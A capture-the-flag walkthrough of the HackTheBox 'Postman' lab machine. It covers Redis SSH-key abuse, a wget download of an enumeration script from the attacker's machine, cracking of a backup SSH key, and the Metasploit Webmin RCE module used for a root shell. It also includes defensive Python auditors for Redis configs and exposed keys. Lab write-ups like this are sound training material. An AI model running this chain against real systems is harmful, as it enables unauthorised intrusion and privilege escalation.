Postman Writeup Hackthebox

Shubham Arya
2 min read · Apr 7, 2020

Hello readers, this is not a full write-up but a quick walkthrough of the Postman box on HackTheBox, just to give a quick path for pwning the box. Follow me on Twitter for more.

# About

  1. Name: Postman
  2. IP: 10.10.10.160
  3. Level: Easy
  4. OS: Linux
  5. Released: 02/Nov/2019

# Enumeration

Commands used for recon:

  • `nmap -sC -sV -oN nmap.txt 10.10.10.160`
  • `nmap -sC -sV -oN nmap_all.txt -p- 10.10.10.160`
  • `gobuster -u http://10.10.10.160/ -w <path to wordlist> -t 20 -o dirscan1.txt`
  • `gobuster -u http://10.10.10.160:10000 -w <path to wordlist> -t 20 -o dirscan2.txt`

The following results were found from the recon:

  1. Bootstrap 4.0 and jQuery 1.12 on port 80.
  2. Port 22: OpenSSH 7.6p1 (no working exploit found).
  3. Port 80: Apache httpd 2.4.29 (no working exploit found).
  4. Port 10000: HTTP (Webmin MiniServ 1.910).
  5. Operating system: Ubuntu (4ubuntu0.3).
  6. ‘http://10.10.10.160/uploads’ directory found on port 80.
  7. ‘https://postman:10000/session_login.cgi’ (login URL found).
  8. Redis key-value store 4.0.9 on port 6379 (revealed only by the full port scan).
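The last finding is the one that matters: a Redis instance reachable from the network with no authentication is what the next section rides on. As an added example (this is not code from the original post and the two sample configs are constructed, not the box's real redis.conf), here is a small Python audit of a redis.conf that flags exactly the settings whose absence makes the ‘config set dir’ trick work: network-wide bind, protected-mode off, no requirepass, and the CONFIG/SAVE commands left enabled.

```python
"""Audit a redis.conf for the settings that let an unauthenticated client
rewrite 'dir'/'dbfilename' and dump the database into a chosen path.
Added example; the two sample configs below are constructed, not the box's."""
import shlex

# Constructed: the kind of permissive config that leaves Redis reachable
# and unauthenticated on the network.
WEAK_CONF = """
# listen on every interface, no auth
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed: a hardened counterpart.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "use-a-long-random-secret-here"
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Return {directive: [argument lists]} keeping every occurrence, since
    some directives (bind, rename-command) are legitimately repeated."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)      # handles the quoted "" in rename-command
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means none of
    the checks below fired."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Network exposure: no bind line means all interfaces in Redis 4.x.
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(addr in ("0.0.0.0", "*", "::") for addr in binds):
        findings.append("bind: listens on all interfaces")

    # 2. protected-mode is the last-resort guard when no bind/requirepass is set.
    protected = conf.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append("protected-mode: disabled")

    # 3. Authentication.
    password = conf.get("requirepass", [[]])[-1]
    if not password or not password[0]:
        findings.append("requirepass: no password set")

    # 4. CONFIG and SAVE are the two commands the dump-to-path abuse needs;
    #    renaming them to "" disables them entirely.
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) == 2 and args[1] == ""}
    for cmd in ("CONFIG", "SAVE"):
        if cmd not in disabled:
            findings.append("%s: command not disabled via rename-command" % cmd)

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(text) or "no findings")
```

Run it against a real config with `audit_redis_conf(open("/etc/redis/redis.conf").read())`. The parser keeps every occurrence of a directive on purpose: `bind` may list several addresses and `rename-command` appears once per command, so collapsing them into a single value would hide findings.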

# Exploitation (User)

  1. Found an exploit for the Redis service on port 6379 on GitHub.
  2. Tweaked the exploit so that its ‘config set dir’ command points at ‘/var/lib/redis/.ssh’.
  3. Logging in with SSH gives us a low-privileged shell as user ‘redis’ on the box.
  4. Start a Python HTTP server on our machine to transfer our LinEnum script to the box.
    `python3 -m http.server`
  5. Download the script on the host.
    `wget http://<ip of your machine>:8000/linenum.sh`
  6. Running the LinEnum enumeration script on the host reveals an ‘id_rsa.back’ file present in the ‘/opt’ directory.
  7. Copy the contents of the ‘id_rsa.bak’ file to our machine.
  8. Convert the file to John format.
    `ssh2john id_rsa.back > hash.txt`
  9. A dictionary attack on the file reveals the password ‘computer2008’ for the user Matt.
    `john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`
  10. From our previous redis shell we log in as user ‘Matt’ using password ‘computer2008’.
    `su Matt`
  11. Traverse to Matt’s home directory and find ‘user.txt’.
    `cd /home/matt ; cat user.txt`
  12. We get our user flag.
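The user step hinges on a backup copy of an SSH private key sitting in ‘/opt’, readable by a low-privileged service account and protected only by a dictionary passphrase. As an added example (not code from the original post), here is a Python scanner an administrator can run to find that pattern: any file carrying a PEM private-key marker that is readable by group/others or stored outside a `.ssh` directory. The directory tree it scans is constructed in a temp directory and the ‘key’ it writes is a placeholder string, not real key material.

```python
"""Walk a directory tree and report private-key files that are readable by
group/others or that live outside a .ssh directory. Added example; the
tree it scans is constructed in a temp directory, and the 'key' inside is
a placeholder string, not real key material."""
import os
import stat
import tempfile

# Constructed placeholder carrying only the PEM markers a scanner looks for.
FAKE_KEY = (b"-----BEGIN RSA PRIVATE KEY-----\n"
            b"placeholder, not a real key\n"
            b"-----END RSA PRIVATE KEY-----\n")


def is_private_key(path):
    """Cheap content check: PEM and OpenSSH private keys all carry this marker."""
    try:
        with open(path, "rb") as fh:
            return b"PRIVATE KEY-----" in fh.read(4096)
    except OSError:
        return False


def find_exposed_private_keys(root):
    """Return [(path, [reasons])] for every key file that fails a check."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not is_private_key(path):
                continue
            reasons = []
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                reasons.append("readable by group/others (mode %o)" % mode)
            if os.path.basename(dirpath) != ".ssh":
                reasons.append("stored outside a .ssh directory")
            if reasons:
                findings.append((path, reasons))
    return findings


def build_demo_tree():
    """Constructed layout: a properly protected key in a .ssh directory and a
    world-readable backup copy dropped in an opt/ directory."""
    root = tempfile.mkdtemp(prefix="keyscan-")
    good_dir = os.path.join(root, "home", "user", ".ssh")
    bad_dir = os.path.join(root, "opt")
    os.makedirs(good_dir)
    os.makedirs(bad_dir)
    good = os.path.join(good_dir, "id_rsa")
    bad = os.path.join(bad_dir, "id_rsa.bak")
    for path, mode in ((good, 0o600), (bad, 0o644)):
        with open(path, "wb") as fh:
            fh.write(FAKE_KEY)
        os.chmod(path, mode)
    # A non-key file in opt/ must not be reported.
    with open(os.path.join(bad_dir, "README"), "w") as fh:
        fh.write("nothing to see\n")
    return root


def scan_demo():
    """Build the constructed tree, scan it, and return the offending basenames."""
    root = build_demo_tree()
    return sorted(os.path.basename(p) for p, _ in find_exposed_private_keys(root))


if __name__ == "__main__":
    for path, reasons in find_exposed_private_keys(build_demo_tree()):
        print(path, "->", "; ".join(reasons))
```

Point `find_exposed_private_keys` at `/` (as root, so every directory is readable) to sweep a host; the mode check alone would have flagged the backup in this box, and the location check catches keys that were copied somewhere with correct permissions but outside any account's `.ssh`.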

# Exploitation (Root)

  1. For root escalation we exploit the Webmin instance hosted on port 10000.
  2. We use the Webmin package-updates remote command execution exploit present in Metasploit.
  3. `sudo msfconsole` to open Metasploit.
  4. Change the options of the exploit with the following commands:
  5. `set ssl on`
  6. `set username Matt`
  7. `set password computer2008`
  8. `set LHOST tun0`
  9. `set RHOST 10.10.10.160`
  10. `exploit`
  11. We get a shell as root on the box.
  12. `cat /root/root.txt` gives us the root flag.

This is how we can pwn the Postman box. Hope you all find this useful. I will try to create detailed write-ups for boxes in the future (if I don’t feel lazy xD).

Shubham Arya

Cyber Security Enthusiast | Computer Science Engineering Student | Bug Bounty Newbie | CTF Player